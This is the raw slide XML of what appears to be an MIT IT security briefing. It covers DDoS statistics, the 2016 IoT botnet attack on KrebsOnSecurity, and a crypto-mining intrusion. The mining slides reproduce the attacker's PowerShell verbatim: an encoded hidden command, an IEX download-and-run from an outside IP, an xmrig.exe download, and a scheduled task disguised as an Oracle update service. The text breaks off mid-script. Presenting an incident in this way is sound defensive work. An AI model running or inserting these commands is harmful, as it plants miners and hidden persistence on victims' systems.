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62" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="266" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="400" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="404" r:id="rId13"/>
    <p:sldId id="405" r:id="rId14"/>
    <p:sldId id="407" r:id="rId15"/>
    <p:sldId id="258" r:id="rId16"/>
    <p:sldId id="394" r:id="rId17"/>
    <p:sldId id="392" r:id="rId18"/>
    <p:sldId id="409" r:id="rId19"/>
    <p:sldId id="401" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="40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5"/>
    <p:restoredTop sz="63854"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="2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May 19, 2015</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>January 7, 2016</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>February 21, 2016</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>April 2, 2016</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>June 7, 2016</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>June 20, 2016</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>September  19, 2016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35</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>89.35</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>295.60000000000002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D-C340-B812-357BF5801D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May 19, 2015</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>January 7, 2016</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>February 21, 2016</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>April 2, 2016</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>June 7, 2016</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>June 20, 2016</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>September  19, 2016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2">
                  <c:v>289</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>363</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>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AD-C340-B812-357BF5801D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85410792"/>
        <c:axId val="-2085407720"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-208541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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="-2085407720"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-2085407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085410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33392568691502"/>
          <c:y val="0.113611315338305"/>
          <c:w val="0.14966607431308501"/>
          <c:h val="0.151480951801424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E9A68-B0F0-2E4F-A671-9415D8FF41B9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CEECA-F3F3-5D4F-B87A-8F1CDF46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1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620 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> incident in September</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> was the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>KrebsOnSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>arstechnica.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/security/2016/09/botnet-of-145k-cameras-reportedly-deliver-internets-biggest-ddos-ever/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/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Between August 2013 - April 2016, MIT received 74 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> campaigns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> what is the trend for MIT?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first six months of 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> MIT received more than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 35 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> campaigns that were mitigated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>akamai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FE59-54E5-7743-9F2D-BF6086D910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0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FE59-54E5-7743-9F2D-BF6086D910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4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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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0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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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0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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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72CA-38E1-A44F-8534-ACAA43207579}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/18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004-5C8D-2D40-8BB7-73C42711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1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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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72CA-38E1-A44F-8534-ACAA43207579}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/18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004-5C8D-2D40-8BB7-73C42711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5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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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0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72CA-38E1-A44F-8534-ACAA43207579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004-5C8D-2D40-8BB7-73C42711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1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72CA-38E1-A44F-8534-ACAA43207579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4004-5C8D-2D40-8BB7-73C42711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92.99.142.232:8220/1.ps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92.99.142.232:8220/xmrig.ex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3F9A-5A92-154F-BFB4-8E38A2BF4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Security at MIT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17996-D388-C447-AA42-41EED00F8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AB8BE-2581-2B42-B91B-9E4050E04396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864426" y="4904509"/>
            <a:ext cx="2459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Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Silis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Associate Vice President</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IS&amp;T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mark@mit.edu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2C70D-1F7E-B645-A907-B102F0F084A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700156" y="4921448"/>
            <a:ext cx="2794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Jessica Murray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Security Officer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IS&amp;T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jlmurray@mit.edu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3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261A-4EDA-834A-A5A9-5E0AD145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traffic – Source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dest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D5FA0-D558-7E4B-B9D5-7196F9632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here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147608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DC64-2B20-DC48-AA3A-C8222696D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traffic– Campus Targets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E5DC0-DC70-2B4F-9E77-5C6238BC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here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35583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A005-E356-D74F-96D6-C0DA9D52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Crypto-mining attempt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1B3E-84B8-154B-8B2C-27584584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FD695-309C-3F44-97AC-604D85CAF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345"/>
            <a:ext cx="9144000" cy="55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8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A005-E356-D74F-96D6-C0DA9D52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Crypto-mining attempt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1B3E-84B8-154B-8B2C-27584584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FD695-309C-3F44-97AC-604D85CAF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345"/>
            <a:ext cx="9144000" cy="5591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0C48BB-4C17-C14D-975F-3A50C89C1EEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190004" y="2336264"/>
            <a:ext cx="6008916" cy="3672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powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NonI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -W Hidden -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -Exec Bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cABvAHcAZQByAHMAaABlAGwAbAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AOQA5AC4AMQA0ADIALgAyADMAMgA6ADgAMgAyADAALwAxAC4AcABzADEAJwApAA==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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('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http://192.99.142.232:8220/1.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
          </a:p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F3BF31-C148-024D-8436-18D62848EF17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6258296" y="2434442"/>
            <a:ext cx="427512" cy="1341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1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A005-E356-D74F-96D6-C0DA9D52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Crypto-mining attempt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1B3E-84B8-154B-8B2C-27584584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FD695-309C-3F44-97AC-604D85CAF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345"/>
            <a:ext cx="9144000" cy="5591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0C48BB-4C17-C14D-975F-3A50C89C1EEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1266345"/>
            <a:ext cx="6198920" cy="5419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"C:\Windows\System32\WINDOW~1\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" "C:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WindowsPowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" IEX "$ne = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MyInvocation.MyCommand.Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.99.142.232:8220/xmrig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noutput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>env:TMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\yam1.exe" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noutput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) copy $ne $HOME\SchTask.ps1 copy $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>env:TMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\yam1.exe $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>env:TMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.exe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SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Create /SC MINUTE /TN "Update service for Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>productsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /TR "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windowstyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hidden -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -File $HOME\SchTask1.ps1" /MO 6 /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products5" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products1" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products2" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products3" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products4" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products7" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products8" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products0" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle products9" /F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SchTasks.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /Delete /TN "Update service for Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>productsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /F while ($true) { if(!(Get-Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
